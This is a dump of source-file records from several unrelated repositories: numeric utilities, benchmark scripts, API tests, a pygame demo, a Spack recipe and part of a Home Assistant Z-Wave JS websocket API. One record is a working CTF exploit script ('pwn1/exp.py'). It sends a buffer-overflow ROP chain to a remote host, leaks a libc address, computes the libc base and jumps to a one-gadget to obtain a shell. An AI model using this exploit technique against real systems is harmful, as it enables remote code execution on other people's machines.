hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c303b78b6ae5eca8c6ab383c7d16e87f6f3ecf0 | 1,367 | py | Python | src/probnum/utils/argutils.py | ralfrost/probnum | 6b0988009a9dd7ecda87ba28c9d5c0b8019981b6 | [
"MIT"
] | null | null | null | src/probnum/utils/argutils.py | ralfrost/probnum | 6b0988009a9dd7ecda87ba28c9d5c0b8019981b6 | [
"MIT"
] | 2 | 2020-12-28T19:37:16.000Z | 2020-12-28T19:37:31.000Z | src/probnum/utils/argutils.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | import numbers
import numpy as np
import scipy._lib._util
from probnum.type import (
DTypeArgType,
RandomStateArgType,
RandomStateType,
ScalarArgType,
ShapeArgType,
ShapeType,
)
__all__ = ["as_shape", "as_random_state", "as_numpy_scalar"]
def as_random_state(x: RandomStateArgType) -> RandomStateType:
return scipy._lib._util.check_random_state(x)
def as_shape(x: ShapeArgType) -> ShapeType:
if isinstance(x, (int, numbers.Integral, np.integer)):
return (int(x),)
elif isinstance(x, tuple) and all(isinstance(item, int) for item in x):
return x
else:
try:
_ = iter(x)
except TypeError as e:
raise TypeError(
f"The given shape {x} must be an integer or an iterable of integers."
) from e
if not all(isinstance(item, (int, numbers.Integral, np.integer)) for item in x):
raise TypeError(f"The given shape {x} must only contain integer values.")
return tuple(int(item) for item in x)
def as_numpy_scalar(x: ScalarArgType, dtype: DTypeArgType = None) -> np.generic:
is_scalar = np.isscalar(x)
is_scalar_array = isinstance(x, np.ndarray) and x.ndim == 0
if not (is_scalar or is_scalar_array):
raise ValueError("The given input is not a scalar.")
return np.asarray(x, dtype=dtype)[()]
| 27.897959 | 88 | 0.65545 | import numbers
import numpy as np
import scipy._lib._util
from probnum.type import (
DTypeArgType,
RandomStateArgType,
RandomStateType,
ScalarArgType,
ShapeArgType,
ShapeType,
)
__all__ = ["as_shape", "as_random_state", "as_numpy_scalar"]
def as_random_state(x: RandomStateArgType) -> RandomStateType:
return scipy._lib._util.check_random_state(x)
def as_shape(x: ShapeArgType) -> ShapeType:
if isinstance(x, (int, numbers.Integral, np.integer)):
return (int(x),)
elif isinstance(x, tuple) and all(isinstance(item, int) for item in x):
return x
else:
try:
_ = iter(x)
except TypeError as e:
raise TypeError(
f"The given shape {x} must be an integer or an iterable of integers."
) from e
if not all(isinstance(item, (int, numbers.Integral, np.integer)) for item in x):
raise TypeError(f"The given shape {x} must only contain integer values.")
return tuple(int(item) for item in x)
def as_numpy_scalar(x: ScalarArgType, dtype: DTypeArgType = None) -> np.generic:
is_scalar = np.isscalar(x)
is_scalar_array = isinstance(x, np.ndarray) and x.ndim == 0
if not (is_scalar or is_scalar_array):
raise ValueError("The given input is not a scalar.")
return np.asarray(x, dtype=dtype)[()]
| true | true |
1c303bbfaf52d7094a4e084d26dd73eef9daf45f | 1,242 | py | Python | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | from timeit import default_timer as timer
import xgboost as xgb
from sklearn.metrics import mean_squared_error
import daal4py as d4p
import numpy as np
import pandas as pd
import common
d4p.daalinit()
NUM_LOOPS = 100
def run_inference(num_observations:int = 1000):
"""Run xgboost for specified number of observations"""
# Load data
train_x_df = common.get_test_data_df(X=common.X_df,size = num_observations)
train_y_df = common.get_test_data_df(X=common.y_df,size = num_observations)
num_rows = len(train_x_df)
######################
print("_______________________________________")
print("Total Number of Rows", num_rows)
run_times = []
inference_times = []
for _ in range(NUM_LOOPS):
start_time = timer()
MODEL = d4p.decision_forest_regression_training(nTrees=100)
train_result = MODEL.compute(train_x_df, train_y_df)
end_time = timer()
total_time = end_time - start_time
run_times.append(total_time*10e3)
inference_time = total_time*(10e6)/num_rows
inference_times.append(inference_time)
return_elem = common.calculate_stats(inference_times)
print(num_observations, ", ", return_elem)
return return_elem | 31.846154 | 79 | 0.710145 | from timeit import default_timer as timer
import xgboost as xgb
from sklearn.metrics import mean_squared_error
import daal4py as d4p
import numpy as np
import pandas as pd
import common
d4p.daalinit()
NUM_LOOPS = 100
def run_inference(num_observations:int = 1000):
train_x_df = common.get_test_data_df(X=common.X_df,size = num_observations)
train_y_df = common.get_test_data_df(X=common.y_df,size = num_observations)
num_rows = len(train_x_df)
.decision_forest_regression_training(nTrees=100)
train_result = MODEL.compute(train_x_df, train_y_df)
end_time = timer()
total_time = end_time - start_time
run_times.append(total_time*10e3)
inference_time = total_time*(10e6)/num_rows
inference_times.append(inference_time)
return_elem = common.calculate_stats(inference_times)
print(num_observations, ", ", return_elem)
return return_elem | true | true |
1c303ca7ab0ce9e52fc5302458ecdf3a2e444354 | 926 | py | Python | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | from pwn import *
from LibcSearcher import *
context(arch="amd64",os="linux",log_level="debug")
GDB=args["GDB"]
context.terminal=["tmux","splitw","-h"]
pop_rdi=0x0000000000400823
ret=0x0000000000400576
main_addr=0x00000000004006c7
p=remote("152.136.44.97",20003)
#p=process("./pwn1")
if GDB=="1":
gdb.attach(p,"b *0x4007b5")
elf=ELF("./pwn1")
printf_plt=elf.plt["printf"]
xx_name="__libc_start_main"
xx_got=elf.got[xx_name]
puts_plt=elf.plt["puts"]
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(pop_rdi)+p64(xx_got)+p64(puts_plt)+p64(main_addr)
p.sendafter("name:",payload)
xx=p.recvuntil("name:").split("\n")
print(xx)
xx=u64(xx[2].ljust(8,"\x00"))
print(hex(xx))
libc=LibcSearcher(xx_name,xx)
base=xx-libc.dump(xx_name)
print(hex(base))
one =base+0x3f4b6
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(one)
p.send(payload)
p.recv()
sleep(2)
if GDB=="1":
pause()
p.interactive()
| 24.368421 | 113 | 0.706263 | from pwn import *
from LibcSearcher import *
context(arch="amd64",os="linux",log_level="debug")
GDB=args["GDB"]
context.terminal=["tmux","splitw","-h"]
pop_rdi=0x0000000000400823
ret=0x0000000000400576
main_addr=0x00000000004006c7
p=remote("152.136.44.97",20003)
if GDB=="1":
gdb.attach(p,"b *0x4007b5")
elf=ELF("./pwn1")
printf_plt=elf.plt["printf"]
xx_name="__libc_start_main"
xx_got=elf.got[xx_name]
puts_plt=elf.plt["puts"]
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(pop_rdi)+p64(xx_got)+p64(puts_plt)+p64(main_addr)
p.sendafter("name:",payload)
xx=p.recvuntil("name:").split("\n")
print(xx)
xx=u64(xx[2].ljust(8,"\x00"))
print(hex(xx))
libc=LibcSearcher(xx_name,xx)
base=xx-libc.dump(xx_name)
print(hex(base))
one =base+0x3f4b6
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(one)
p.send(payload)
p.recv()
sleep(2)
if GDB=="1":
pause()
p.interactive()
| true | true |
1c303e019a9c09f96c42761d9f78868ee266b4b8 | 911 | py | Python | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | # coding: utf-8
import pytest
import json
from aiohttp import web
async def test_pokedex_list(client):
"""Test case for pokedex_list
"""
params = [('limit', 56),
('offset', 56)]
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/',
headers=headers,
params=params,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
async def test_pokedex_read(client):
"""Test case for pokedex_read
"""
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/{id}'.format(id=56),
headers=headers,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
| 21.186047 | 98 | 0.556531 |
import pytest
import json
from aiohttp import web
async def test_pokedex_list(client):
params = [('limit', 56),
('offset', 56)]
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/',
headers=headers,
params=params,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
async def test_pokedex_read(client):
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/{id}'.format(id=56),
headers=headers,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
| true | true |
1c303e0665ded3b0c3bd5a41f5245167a180cf79 | 1,462 | py | Python | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 244 | 2015-01-01T12:04:44.000Z | 2022-03-25T23:38:39.000Z | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 6 | 2015-08-18T08:19:10.000Z | 2022-03-05T02:32:36.000Z | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 178 | 2015-01-02T15:16:58.000Z | 2022-03-23T03:30:20.000Z | # Copyright 2016 Tesora, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import os
from trove.common import stream_codecs
from trove.tests.unittests import trove_testtools
class TestStreamCodecs(trove_testtools.TestCase):
def setUp(self):
super(TestStreamCodecs, self).setUp()
def tearDown(self):
super(TestStreamCodecs, self).tearDown()
def test_serialize_deserialize_base64codec(self):
random_data = bytearray(os.urandom(12))
data = [b'abc',
b'numbers01234',
b'non-ascii:\xe9\xff',
random_data]
codec = stream_codecs.Base64Codec()
for datum in data:
serialized_data = codec.serialize(datum)
deserialized_data = codec.deserialize(serialized_data)
self. assertEqual(datum, deserialized_data,
"Serialize/Deserialize failed")
| 33.227273 | 78 | 0.674419 |
import os
from trove.common import stream_codecs
from trove.tests.unittests import trove_testtools
class TestStreamCodecs(trove_testtools.TestCase):
def setUp(self):
super(TestStreamCodecs, self).setUp()
def tearDown(self):
super(TestStreamCodecs, self).tearDown()
def test_serialize_deserialize_base64codec(self):
random_data = bytearray(os.urandom(12))
data = [b'abc',
b'numbers01234',
b'non-ascii:\xe9\xff',
random_data]
codec = stream_codecs.Base64Codec()
for datum in data:
serialized_data = codec.serialize(datum)
deserialized_data = codec.deserialize(serialized_data)
self. assertEqual(datum, deserialized_data,
"Serialize/Deserialize failed")
| true | true |
1c303eb256f57ba792c46d3cf5344ec0037aefbb | 1,826 | py | Python | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | 1 | 2022-02-19T17:57:57.000Z | 2022-02-19T17:57:57.000Z | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | null | null | null | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | 24 | 2022-02-03T01:37:44.000Z | 2022-02-17T00:00:10.000Z | import pygame
import sys
from pygame.locals import *
pygame.init()
vec = pygame.math.Vector2 # 2 for two dimensional
HEIGHT = 450
WIDTH = 400
ACC = 0.5
FRIC = -0.12
FPS = 60
FramePerSec = pygame.time.Clock()
displaysurface = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Marist Platformer")
class Player(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((30, 30))
self.surf.fill((255,123,201))
self.rect = self.surf.get_rect()
self.pos = vec((10, 435))
self.vel = vec(0,0)
self.acc = vec(0,0)
def move(self):
self.acc = vec(0,0)
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_LEFT]:
self.acc.x = -ACC
if pressed_keys[K_RIGHT]:
self.acc.x = ACC
self.acc.x += self.vel.x * FRIC
self.vel += self.acc
self.pos += self.vel + 0.5 * self.acc
if self.pos.x > WIDTH:
self.pos.x = 0
if self.pos.x < 0:
self.pos.x = WIDTH
self.rect.midbottom = self.pos
class platform(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((WIDTH, 20))
self.surf.fill((130,255,122))
self.rect = self.surf.get_rect(center = (WIDTH/2, HEIGHT - 10))
PT1 = platform()
P1 = Player()
all_sprites = pygame.sprite.Group()
all_sprites.add(PT1)
all_sprites.add(P1)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
displaysurface.fill((0,0,0))
for entity in all_sprites:
displaysurface.blit(entity.surf, entity.rect)
P1.move()
pygame.display.update()
FramePerSec.tick(FPS) | 23.113924 | 71 | 0.586528 | import pygame
import sys
from pygame.locals import *
pygame.init()
vec = pygame.math.Vector2
HEIGHT = 450
WIDTH = 400
ACC = 0.5
FRIC = -0.12
FPS = 60
FramePerSec = pygame.time.Clock()
displaysurface = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Marist Platformer")
class Player(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((30, 30))
self.surf.fill((255,123,201))
self.rect = self.surf.get_rect()
self.pos = vec((10, 435))
self.vel = vec(0,0)
self.acc = vec(0,0)
def move(self):
self.acc = vec(0,0)
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_LEFT]:
self.acc.x = -ACC
if pressed_keys[K_RIGHT]:
self.acc.x = ACC
self.acc.x += self.vel.x * FRIC
self.vel += self.acc
self.pos += self.vel + 0.5 * self.acc
if self.pos.x > WIDTH:
self.pos.x = 0
if self.pos.x < 0:
self.pos.x = WIDTH
self.rect.midbottom = self.pos
class platform(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((WIDTH, 20))
self.surf.fill((130,255,122))
self.rect = self.surf.get_rect(center = (WIDTH/2, HEIGHT - 10))
PT1 = platform()
P1 = Player()
all_sprites = pygame.sprite.Group()
all_sprites.add(PT1)
all_sprites.add(P1)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
displaysurface.fill((0,0,0))
for entity in all_sprites:
displaysurface.blit(entity.surf, entity.rect)
P1.move()
pygame.display.update()
FramePerSec.tick(FPS) | true | true |
1c303ed5063c2386e4bfac776b7b7e5f21c6f757 | 1,377 | py | Python | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2019-02-10T13:47:48.000Z | 2019-04-17T13:05:17.000Z | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17 | 2019-03-21T15:54:00.000Z | 2022-03-29T19:34:28.000Z | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2018-04-06T09:04:11.000Z | 2020-01-24T12:52:12.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
_versions = {
'0.79.47': {
'Linux-x86_64': ('b8a4a74118c1a024313bf912261fbc016a53f2d15adb1226217f2a10a9f7ca9a', 'https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz'),
'Linux-aarch64': ('3ff052013daf319927d04ba83b8f90c12575983911faf6c1559437062032b669', 'http://www.flxpert.hu/fl/fl_0.79.47-aarch64-linux.tar.gz')
}
}
class Fl(Package):
"""Fawlty Language is an IDL8
(Interactive Data Language) compatible compiler."""
homepage = "https://www.flxpert.hu/fl/"
url = "https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz"
for ver, packages in _versions.items():
key = "{0}-{1}".format(platform.system(), platform.machine())
pkg = packages.get(key)
if pkg:
version(ver, sha256=pkg[0], url=pkg[1])
def install(self, spec, prefix):
if (self.spec.satisfies('platform=linux') and
self.spec.target.family in ['x86_64', 'aarch64']):
with working_dir('fl_{0}'.format(spec.version)):
install_tree('.', prefix)
else:
raise InstallError('fl requires Linux x86_64 or aarch64 platform.')
| 37.216216 | 153 | 0.659405 |
from spack import *
import platform
_versions = {
'0.79.47': {
'Linux-x86_64': ('b8a4a74118c1a024313bf912261fbc016a53f2d15adb1226217f2a10a9f7ca9a', 'https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz'),
'Linux-aarch64': ('3ff052013daf319927d04ba83b8f90c12575983911faf6c1559437062032b669', 'http://www.flxpert.hu/fl/fl_0.79.47-aarch64-linux.tar.gz')
}
}
class Fl(Package):
homepage = "https://www.flxpert.hu/fl/"
url = "https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz"
for ver, packages in _versions.items():
key = "{0}-{1}".format(platform.system(), platform.machine())
pkg = packages.get(key)
if pkg:
version(ver, sha256=pkg[0], url=pkg[1])
def install(self, spec, prefix):
if (self.spec.satisfies('platform=linux') and
self.spec.target.family in ['x86_64', 'aarch64']):
with working_dir('fl_{0}'.format(spec.version)):
install_tree('.', prefix)
else:
raise InstallError('fl requires Linux x86_64 or aarch64 platform.')
| true | true |
1c303eea0533e7776a120588819a11955b42166d | 44,135 | py | Python | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | """Websocket API for Z-Wave JS."""
from __future__ import annotations
import dataclasses
from functools import partial, wraps
import json
from typing import Any, Callable
from aiohttp import hdrs, web, web_exceptions, web_request
import voluptuous as vol
from zwave_js_server import dump
from zwave_js_server.client import Client
from zwave_js_server.const import CommandClass, LogLevel
from zwave_js_server.exceptions import (
BaseZwaveJSServerError,
FailedCommand,
InvalidNewValue,
NotFoundError,
SetValueFailed,
)
from zwave_js_server.firmware import begin_firmware_update
from zwave_js_server.model.firmware import (
FirmwareUpdateFinished,
FirmwareUpdateProgress,
)
from zwave_js_server.model.log_config import LogConfig
from zwave_js_server.model.log_message import LogMessage
from zwave_js_server.model.node import Node
from zwave_js_server.util.node import async_set_config_parameter
from homeassistant.components import websocket_api
from homeassistant.components.http.view import HomeAssistantView
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.components.websocket_api.const import (
ERR_NOT_FOUND,
ERR_NOT_SUPPORTED,
ERR_UNKNOWN_ERROR,
)
from homeassistant.config_entries import ConfigEntry, ConfigEntryState
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import Unauthorized
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import DeviceEntry
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import (
CONF_DATA_COLLECTION_OPTED_IN,
DATA_CLIENT,
DATA_UNSUBSCRIBE,
DOMAIN,
EVENT_DEVICE_ADDED_TO_REGISTRY,
)
from .helpers import async_enable_statistics, update_data_collection_preference
from .services import BITMASK_SCHEMA
# general API constants
ID = "id"
ENTRY_ID = "entry_id"
ERR_NOT_LOADED = "not_loaded"
NODE_ID = "node_id"
COMMAND_CLASS_ID = "command_class_id"
TYPE = "type"
PROPERTY = "property"
PROPERTY_KEY = "property_key"
VALUE = "value"
SECURE = "secure"
# constants for log config commands
CONFIG = "config"
LEVEL = "level"
LOG_TO_FILE = "log_to_file"
FILENAME = "filename"
ENABLED = "enabled"
FORCE_CONSOLE = "force_console"
# constants for setting config parameters
VALUE_ID = "value_id"
STATUS = "status"
# constants for data collection
ENABLED = "enabled"
OPTED_IN = "opted_in"
def async_get_entry(orig_func: Callable) -> Callable:
"""Decorate async function to get entry."""
@wraps(orig_func)
async def async_get_entry_func(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide user specific data and store to function."""
entry_id = msg[ENTRY_ID]
entry = hass.config_entries.async_get_entry(entry_id)
if entry is None:
connection.send_error(
msg[ID], ERR_NOT_FOUND, f"Config entry {entry_id} not found"
)
return
if entry.state is not ConfigEntryState.LOADED:
connection.send_error(
msg[ID], ERR_NOT_LOADED, f"Config entry {entry_id} not loaded"
)
return
client = hass.data[DOMAIN][entry_id][DATA_CLIENT]
await orig_func(hass, connection, msg, entry, client)
return async_get_entry_func
def async_get_node(orig_func: Callable) -> Callable:
"""Decorate async function to get node."""
@async_get_entry
@wraps(orig_func)
async def async_get_node_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Provide user specific data and store to function."""
node_id = msg[NODE_ID]
node = client.driver.controller.nodes.get(node_id)
if node is None:
connection.send_error(msg[ID], ERR_NOT_FOUND, f"Node {node_id} not found")
return
await orig_func(hass, connection, msg, node)
return async_get_node_func
def async_handle_failed_command(orig_func: Callable) -> Callable:
"""Decorate async function to handle FailedCommand and send relevant error."""
@wraps(orig_func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await orig_func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
# Unsubscribe to callbacks
if unsubs := msg.get(DATA_UNSUBSCRIBE):
for unsub in unsubs:
unsub()
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_network_status)
websocket_api.async_register_command(hass, websocket_node_status)
websocket_api.async_register_command(hass, websocket_node_state)
websocket_api.async_register_command(hass, websocket_node_metadata)
websocket_api.async_register_command(hass, websocket_ping_node)
websocket_api.async_register_command(hass, websocket_add_node)
websocket_api.async_register_command(hass, websocket_stop_inclusion)
websocket_api.async_register_command(hass, websocket_stop_exclusion)
websocket_api.async_register_command(hass, websocket_remove_node)
websocket_api.async_register_command(hass, websocket_remove_failed_node)
websocket_api.async_register_command(hass, websocket_replace_failed_node)
websocket_api.async_register_command(hass, websocket_begin_healing_network)
websocket_api.async_register_command(
hass, websocket_subscribe_heal_network_progress
)
websocket_api.async_register_command(hass, websocket_stop_healing_network)
websocket_api.async_register_command(hass, websocket_refresh_node_info)
websocket_api.async_register_command(hass, websocket_refresh_node_values)
websocket_api.async_register_command(hass, websocket_refresh_node_cc_values)
websocket_api.async_register_command(hass, websocket_heal_node)
websocket_api.async_register_command(hass, websocket_set_config_parameter)
websocket_api.async_register_command(hass, websocket_get_config_parameters)
websocket_api.async_register_command(hass, websocket_subscribe_log_updates)
websocket_api.async_register_command(hass, websocket_update_log_config)
websocket_api.async_register_command(hass, websocket_get_log_config)
websocket_api.async_register_command(
hass, websocket_update_data_collection_preference
)
websocket_api.async_register_command(hass, websocket_data_collection_status)
websocket_api.async_register_command(hass, websocket_version_info)
websocket_api.async_register_command(hass, websocket_abort_firmware_update)
websocket_api.async_register_command(
hass, websocket_subscribe_firmware_update_status
)
websocket_api.async_register_command(hass, websocket_check_for_config_updates)
websocket_api.async_register_command(hass, websocket_install_config_update)
hass.http.register_view(DumpView())
hass.http.register_view(FirmwareUploadView())
@websocket_api.require_admin
@websocket_api.websocket_command(
{vol.Required(TYPE): "zwave_js/network_status", vol.Required(ENTRY_ID): str}
)
@websocket_api.async_response
@async_get_entry
async def websocket_network_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Get the status of the Z-Wave JS network."""
controller = client.driver.controller
data = {
"client": {
"ws_server_url": client.ws_server_url,
"state": "connected" if client.connected else "disconnected",
"driver_version": client.version.driver_version,
"server_version": client.version.server_version,
},
"controller": {
"home_id": controller.home_id,
"library_version": controller.library_version,
"type": controller.controller_type,
"own_node_id": controller.own_node_id,
"is_secondary": controller.is_secondary,
"is_using_home_id_from_other_network": controller.is_using_home_id_from_other_network,
"is_sis_present": controller.is_SIS_present,
"was_real_primary": controller.was_real_primary,
"is_static_update_controller": controller.is_static_update_controller,
"is_slave": controller.is_slave,
"serial_api_version": controller.serial_api_version,
"manufacturer_id": controller.manufacturer_id,
"product_id": controller.product_id,
"product_type": controller.product_type,
"supported_function_types": controller.supported_function_types,
"suc_node_id": controller.suc_node_id,
"supports_timers": controller.supports_timers,
"is_heal_network_active": controller.is_heal_network_active,
"nodes": list(client.driver.controller.nodes),
},
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_status",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Get the status of a Z-Wave JS node."""
data = {
"node_id": node.node_id,
"is_routing": node.is_routing,
"status": node.status,
"is_secure": node.is_secure,
"ready": node.ready,
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_state",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_state(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Get the state data of a Z-Wave JS node."""
connection.send_result(
msg[ID],
node.data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_metadata",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_metadata(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Get the metadata of a Z-Wave JS node."""
data = {
"node_id": node.node_id,
"exclusion": node.device_config.metadata.exclusion,
"inclusion": node.device_config.metadata.inclusion,
"manual": node.device_config.metadata.manual,
"wakeup": node.device_config.metadata.wakeup,
"reset": node.device_config.metadata.reset,
"device_database_url": node.device_database_url,
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/ping_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_ping_node(
hass: HomeAssistant,
connection: ActiveConnection,
